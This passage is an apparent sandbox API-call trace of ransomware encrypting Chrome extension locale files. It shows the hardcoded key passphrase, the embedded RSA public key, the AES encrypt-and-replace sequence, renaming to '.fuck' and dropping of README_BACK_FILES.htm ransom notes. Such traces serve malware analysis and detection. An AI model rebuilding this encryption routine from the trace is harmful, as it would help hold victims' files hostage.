lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.893] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0258.893] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.894] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.894] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0258.894] GetLastError () returned 0x0 [0258.894] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json")) returned 0x20 [0258.894] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json", dwFileAttributes=0x80) returned 1 [0258.895] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.895] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0258.896] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0258.896] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7bdf8) returned 1 [0258.898] CryptCreateHash (in: hProv=0x2e7bdf8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0258.898] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0258.898] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.898] CryptDeriveKey (in: hProv=0x2e7bdf8, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c380) returned 1 [0258.899] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.899] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0258.899] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e7b028) returned 1 [0258.899] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7b028, dwCertEncodingType=0x1, pInfo=0x2e267c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e267f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e267f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7c680) returned 1 [0258.899] CryptEncrypt (in: hKey=0x2e7c680, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0258.899] CryptEncrypt (in: hKey=0x2e7c680, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7afa0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e7afa0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0258.899] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e7afa0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e7afa0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0258.900] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x376, lpOverlapped=0x0) returned 1 [0258.902] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x376, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0258.902] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0258.909] CloseHandle (hObject=0x5d60) returned 1 [0258.909] CloseHandle (hObject=0x5d5c) returned 1 [0258.909] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json"), bFailIfExists=0) returned 1 [0258.911] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json", dwFileAttributes=0x0) returned 1 [0258.912] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.gsg")) returned 1 [0258.913] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.fuck")) returned 1 [0258.914] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0258.914] CryptDestroyKey (hKey=0x2e7c380) returned 1 [0258.914] CryptReleaseContext (hProv=0x2e7bdf8, dwFlags=0x0) returned 1 [0258.914] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0258.914] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0258.914] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\readme_back_files.htm")) returned 0xffffffff [0258.914] AreFileApisANSI () returned 1 [0258.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0258.914] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0258.915] GetFileType (hFile=0x5d64) returned 0x1 [0258.915] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0258.916] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.916] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0258.917] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.917] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.917] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0258.917] GetLastError () returned 0x0 [0258.917] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json")) returned 0x20 [0258.918] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json", dwFileAttributes=0x80) returned 1 [0258.918] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0258.919] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.920] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0258.920] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7bdf8) returned 1 [0258.922] CryptCreateHash (in: hProv=0x2e7bdf8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0258.922] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0258.922] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.922] CryptDeriveKey (in: hProv=0x2e7bdf8, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c700) returned 1 [0258.922] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.922] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0258.922] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e7b3e0) returned 1 [0258.923] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7b3e0, dwCertEncodingType=0x1, pInfo=0x2e26ca0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e26cd0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e26cd8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7c2c0) returned 1 [0258.923] CryptEncrypt (in: hKey=0x2e7c2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0258.923] CryptEncrypt (in: hKey=0x2e7c2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7b468*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e7b468*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0258.923] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e7b468*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e7b468*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0258.924] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x2c1, lpOverlapped=0x0) returned 1 [0258.926] CryptEncrypt (in: hKey=0x2e7c700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2c1, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2d0) returned 1 [0258.926] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2d0, lpOverlapped=0x0) returned 1 [0258.927] CloseHandle (hObject=0x5d5c) returned 1 [0258.927] CloseHandle (hObject=0x5d60) returned 1 [0258.927] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json"), bFailIfExists=0) returned 1 [0258.930] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json", dwFileAttributes=0x0) returned 1 [0258.930] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.gsg")) returned 1 [0258.931] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.fuck")) returned 1 [0258.932] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0258.932] CryptDestroyKey (hKey=0x2e7c700) returned 1 [0258.932] CryptReleaseContext (hProv=0x2e7bdf8, dwFlags=0x0) returned 1 [0258.932] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0258.932] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0258.932] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\readme_back_files.htm")) returned 0xffffffff [0258.932] AreFileApisANSI () returned 1 [0258.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0258.932] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0258.933] GetFileType (hFile=0x5d64) returned 0x1 [0258.933] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0258.934] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.934] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0258.934] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.934] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.934] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0258.934] GetLastError () returned 0x0 [0258.935] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json")) returned 0x20 [0258.935] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json", dwFileAttributes=0x80) returned 1 [0258.936] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.936] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0258.937] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0258.937] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0258.939] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0258.939] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0258.939] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.939] CryptDeriveKey (in: hProv=0x2e7b4f0, 